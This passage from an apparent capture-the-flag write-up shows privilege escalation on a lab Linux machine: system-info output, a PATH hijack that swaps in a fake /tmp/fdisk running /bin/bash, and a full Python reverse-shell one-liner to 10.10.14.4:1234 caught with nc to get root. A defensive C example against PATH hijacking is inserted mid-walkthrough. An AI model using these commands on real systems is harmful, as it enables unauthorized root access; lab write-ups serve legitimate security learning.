Disk /dev/loop4: 44.2 MiB, 46325760 bytes, 90480 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop5: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop6: 54.7 MiB, 57294848 bytes, 111904 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop7: 160.2 MiB, 167931904 bytes, 327992 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes






Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x44c94251

Device     Boot Start      End  Sectors Size Id Type
/dev/sda1  *     2048 41940991 41938944  20G 83 Linux


Disk /dev/loop8: 91.4 MiB, 95805440 bytes, 187120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop9: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop10: 54.5 MiB, 57151488 bytes, 111624 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop11: 149.9 MiB, 157192192 bytes, 307016 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

====================CPU Info====================
processor       : 0
vendor_id       : AuthenticAMD
cpu family      : 23
model           : 1
model name      : AMD EPYC 7401P 24-Core Processor
stepping        : 2
microcode       : 0x8001230
cpu MHz         : 2000.000
cache size      : 512 KB
physical id     : 0
siblings        : 1
core id         : 0
cpu cores       : 1
apicid          : 0
initial apicid  : 0
fpu             : yes
fpu_exception   : yes
cpuid level     : 13
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs            : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips        : 4000.00
TLB size        : 2560 4K pages
clflush size    : 64
cache_alignment : 64
address sizes   : 43 bits physical, 48 bits virtual
power management:

processor       : 1
vendor_id       : AuthenticAMD
cpu family      : 23
model           : 1
model name      : AMD EPYC 7401P 24-Core Processor
stepping        : 2
microcode       : 0x8001230
cpu MHz         : 2000.000
cache size      : 512 KB
physical id     : 2
siblings        : 1
core id         : 0
cpu cores       : 1
apicid          : 2
initial apicid  : 2
fpu             : yes
fpu_exception   : yes
cpuid level     : 13
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs            : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips        : 4000.00
TLB size        : 2560 4K pages
clflush size    : 64
cache_alignment : 64
address sizes   : 43 bits physical, 48 bits virtual
power management:


====================MEM Usage=====================
              total        used        free      shared  buff/cache   available
Mem:           3.8G        595M        1.6G         12M        1.6G        3.0G
Swap:          947M          0B        947M

You can see that the Disk Info section is identical to the output of fdisk -l.

So, as before, we use PATH to replace the fdisk that gets executed.

theseus@ubuntu:/tmp$ touch fdisk
touch fdisk
theseus@ubuntu:/tmp$ echo /bin/bash > fdisk
echo /bin/bash > fdisk
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$

Now /tmp/fdisk should be executed instead of the real fdisk.
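An added example, not the machine's info.c (the write-up does not reproduce it): how a SUID helper like sysinfo should invoke fdisk so that the PATH trick above has nothing to hijack. Each tool is run by absolute path through execve with a fixed environment, so an exported PATH=/tmp:$PATH never takes part in resolving the name. TRUSTED_DIRS and the exit-status convention are assumptions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Directories a privileged helper may run tools from (assumed policy). */
static const char *const TRUSTED_DIRS[] = {"/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/"};

/* The only environment a child ever gets: nothing from the caller, so an
 * exported PATH=/tmp:$PATH never takes part in resolving a tool name. */
static char *const CLEAN_ENV[] = {"PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL};

/* Accept only an absolute path directly inside a trusted directory, with no
 * dot components: "fdisk", "/tmp/fdisk" and "/sbin/../tmp/fdisk" are all refused. */
bool trusted_tool_path(const char *path) {
    if (!path || path[0] != '/' || strstr(path, "/.")) return false;
    for (size_t i = 0; i < sizeof TRUSTED_DIRS / sizeof TRUSTED_DIRS[0]; i++) {
        size_t n = strlen(TRUSTED_DIRS[i]);
        if (strncmp(path, TRUSTED_DIRS[i], n) == 0 && path[n] != '\0' &&
            strchr(path + n, '/') == NULL)
            return true;
    }
    return false;
}

/* Run one tool with a fixed argv and CLEAN_ENV. execve takes the path as given
 * and does no PATH search, which is the whole point. Returns the child's exit
 * status, or -1 if the path is refused or the child could not be started. */
int run_trusted(char *const argv[]) {
    if (!argv || !argv[0] || !trusted_tool_path(argv[0])) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], argv, CLEAN_ENV);
        _exit(127);                      /* only reached if exec itself failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Single-argument convenience wrapper. */
int run_one(const char *tool) {
    char *const argv[] = {(char *)tool, NULL};
    return run_trusted(argv);
}

/* What the Disk Info step of a sysinfo-style helper should look like: the
 * tool is named in full, so there is no lookup for /tmp/fdisk to win. */
int disk_info(void) {
    char *const argv[] = {"/sbin/fdisk", "-l", NULL};
    return run_trusted(argv);
}

int main(void) {
    printf("fdisk -l exited with %d (relative name refused: %d)\n",
           disk_info(), run_one("fdisk"));
    return 0;
}
```

The same pattern applies to the lshw, /proc/cpuinfo and free steps of such a helper; a setuid binary that calls system("fdisk -l") inherits the caller's PATH and is exactly what the write-up abuses.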

root@ubuntu:/tmp# ls
ls
root@ubuntu:/tmp# cd ../root
cd ../root

For some reason I ended up with a shell that returned no output, so I reused the python from the payload embedded in the image,

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

and caught it with nc in a separate shell.

Then:

kali@kali:~$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.185] 40152
root@ubuntu:/root# ls
ls
info.c
root.txt

And that gives root.

Closing

This was a really fun machine! I was stuck on the EXIF part for a long time and kept searching the forum for hints. lol
